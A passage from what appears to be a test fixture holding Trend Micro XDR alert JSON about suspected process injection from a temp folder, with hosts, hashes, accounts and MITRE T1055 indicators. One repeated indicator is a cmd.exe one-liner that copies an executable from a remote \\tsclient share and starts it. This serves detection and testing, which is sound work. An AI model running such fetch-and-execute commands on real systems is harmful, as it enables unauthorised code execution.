\"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": \"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", 
\"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": 
\"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", 
\"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 11, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 12, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 13, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": 
[\"Alert\"]}, {\"id\": 14, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 15, \"type\": \"fullpath\", \"field\": \"parentFilePath\", \"value\": \"C:\\\\Windows\\\\System32\\\\cmd.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 16, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\54\\\\SesProbe-31944.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 17, \"type\": \"fullpath\", \"field\": \"objectName\", \"value\": \"C:\\\\Windows\\\\System32\\\\gpresult.exe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 18, \"type\": \"host\", \"field\": \"\", \"value\": {\"guid\": \"\", \"name\": \"99.255.12.39\", \"ips\": [\"99.255.12.39\"]}, \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Lateral Movement Enrichment\"]}, {\"id\": 19, \"type\": \"process_id\", \"field\": \"objectPid\", \"value\": \"5552\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 20, \"type\": \"user_account\", \"field\": \"\", \"value\": \"systel.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 21, \"type\": \"user_account\", \"field\": \"\", \"value\": \"srv-serveur\", \"relatedEntities\": 
[\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}, {\"id\": 22, \"type\": \"user_account\", \"field\": \"\", \"value\": \"daqsan.support\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"bec297c0-7e55-488e-b02a-192a87069661\", \"model\": \"Process Injection from Windows Temporary Location to System32\", \"modelType\": \"preset\", \"score\": 51, \"severity\": \"medium\", \"createdDateTime\": \"2024-07-23T07:49:48Z\", \"updatedDateTime\": \"2024-07-23T07:49:59Z\", \"ownerIds\": [], \"incidentId\": \"IC-14558-20240722-00000\", \"impactScope\": {\"desktopCount\": 14, \"serverCount\": 1, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"windows10\\\\jdoe\", \"entityId\": \"windows10\\\\jdoe\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"name\": \"CHTX-XMEDICA-2K12.windows10.local\", \"ips\": [\"19.112.87.74\"]}, \"entityId\": \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"name\": 
\"PRESTATAIR-2K19\", \"ips\": [\"1.231.184.40\"]}, \"entityId\": \"E991724A-42D2-44F9-B122-40290A2E9E15\", \"relatedEntities\": [\"windows10\\\\jdoe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"name\": \"\", \"ips\": [\"\"]}, \"entityId\": \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"name\": \"XBURN-2K16\", \"ips\": [\"248.131.28.153\"]}, \"entityId\": \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"name\": \"LB-XMEDICA-2K12\", \"ips\": [\"247.47.158.155\"]}, \"entityId\": \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"name\": \"C2583-SCLITE1-2\", \"ips\": [\"174.76.164.124\"]}, \"entityId\": \"07C50CDB-F5A9-4368-9035-3173E9580770\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"name\": \"MONECHO-2K22\", \"ips\": [\"236.2.20.78\"]}, \"entityId\": \"D198406E-C84D-4254-8268-F6D02946EFCE\", 
\"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"name\": \"DXRECUP-2K19-T.windows10.local\", \"ips\": [\"fe80::cd06:59d9:574d:d989%14\"]}, \"entityId\": \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"name\": \"XMEDPRINT-2K19\", \"ips\": [\"89.67.140.152\"]}, \"entityId\": \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"name\": \"SCR-2K16\", \"ips\": [\"156.39.139.182\"]}, \"entityId\": \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"relatedEntities\": [], \"relatedIndicatorIds\": [7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"48c7d9d7-54b0-4d1b-8150-3a1657a303d8\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"name\": \"ANTARES-2K16\", \"ips\": [\"82.9.180.60\"]}, \"entityId\": \"8F56027B-D321-4914-AD72-B97B2888A414\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"name\": \"SATIS-2K22\", \"ips\": [\"237.154.233.153\"]}, \"entityId\": \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], 
\"managementScopeGroupId\": \"f7566d2b-6522-4f5f-9a92-8e9b72176c8d\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"name\": \"COPILOTE-TEST.windows10.local\", \"ips\": [\"172.39.11.166\"]}, \"entityId\": \"673794B3-E11C-4992-8713-6CC954D64E21\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"name\": \"NEWAC-LB-2K22.windows10.local\", \"ips\": [\"fe80::87e9:927d:58dd:d66c%5\"]}, \"entityId\": \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"name\": \"BI4-2K22.windows10.local\", \"ips\": [\"96.70.247.104\"]}, \"entityId\": \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\", \"relatedEntities\": [], \"relatedIndicatorIds\": [1, 5, 7], \"provenance\": [\"Sweeping\"], \"managementScopeGroupId\": \"4283bdf5-a191-4df8-bf2e-f6dc17c16ff0\"}]}, \"description\": \"Detects possible unauthorized windows system process modification from a process running in Windows temporary locations\", \"matchedRules\": [{\"id\": \"34885eaa-08ba-4efc-ae46-70663dba0804\", \"name\": \"Process Injection from Windows Temporary Location to System32\", \"matchedFilters\": [{\"id\": \"1aeea7bb-9b05-4dff-af2b-30027e53bb15\", \"name\": \"Process Injection To System32 Executable via CMD\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055.012\", \"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}, {\"id\": 
\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\", \"name\": \"Cross-Process Injection by Process from Temporary Locations\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"mitreTechniqueIds\": [\"T1055\"], \"matchedEvents\": [{\"uuid\": \"aa8247f3-ab9f-4af1-bc70-f83ec4943ebb\", \"matchedDateTime\": \"2024-07-23T07:43:25.945Z\", \"type\": \"TELEMETRY_MODIFIED_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 
4, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"SesProbe-31944.exe \", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"C:\\\\WINDOWS\\\\System32\\\\gpresult.exe /R\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"\\\"C:\\\\WINDOWS\\\\system32\\\\CMD.exe\\\" /CCD C:\\\\Users\\\\USERNAME\\\\AppData\\\\Local\\\\Temp\\\\54&ECHO @SET X=SesProbe-31944.exe>S&ECHO @SET P=\\\\\\\\tsclient\\\\SESPRO\\\\BIN>>S&ECHO :B>>S&ECHO @PING 1 -n 2 -w 50>>S&ECHO @IF NOT EXIST %P% GOTO B>>S&ECHO @COPY %P% %X%>>S&ECHO @START %X%>>S&MOVE /Y S S.BAT&S\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"b44deff4-50c3-4d5a-8c5c-f404ebdd8ecb\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"file_sha1\", \"field\": \"processFileHashSha1\", \"value\": \"3437F7D4E4D48B0F19BD0BB73BB8A9FDBFF2505F\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\", \"7E8FDBEF-FFF7-4C41-9E33-171366D30299\", \"BACF072C-4180-4F3A-B7E0-3E8984282294\", \"A5AB05AF-43F0-4DCF-9AD5-9D67D7949FD7\", \"9D6BEFC4-70D3-478A-84AF-A06516E32025\", \"07C50CDB-F5A9-4368-9035-3173E9580770\", 
\"D198406E-C84D-4254-8268-F6D02946EFCE\", \"4E3230C3-143C-4692-90F6-DA0BEE1A703B\", \"0174C373-64D0-40F9-A95F-7F12933B3A4C\", \"B21866E7-ECB7-4EB7-BBE1-8FB3759F5F77\", \"8F56027B-D321-4914-AD72-B97B2888A414\", \"EFC3BA71-F83B-4ED4-B2EA-5068D3D10104\", \"673794B3-E11C-4992-8713-6CC954D64E21\", \"D62C5057-F860-4B23-9BB9-706C41B08543\", \"6F95CE0D-0F49-4FF1-9413-3B57FC82B680\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 9, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"7DF7979A52BF77DA6A9E8EEDD56FA8081B1F858CB60378C83B250B96CBF24303\", \"relatedEntities\": [\"E991724A-42D2-44F9-B122-40290A2E9E15\"], \"filterIds\": [\"1aeea7bb-9b05-4dff-af2b-30027e53bb15\"], \"provenance\": [\"Alert\"]}, {\"id\": 10, \"type\": \"file_sha256\", \"field\": \"parentFileHashSha256\", \"value\": \"A354C8A720FAD1AA60AD27CE3FEB0A84B906224A9BC10FC5E87B604BD2CA4502\", \"relatedEntities\": 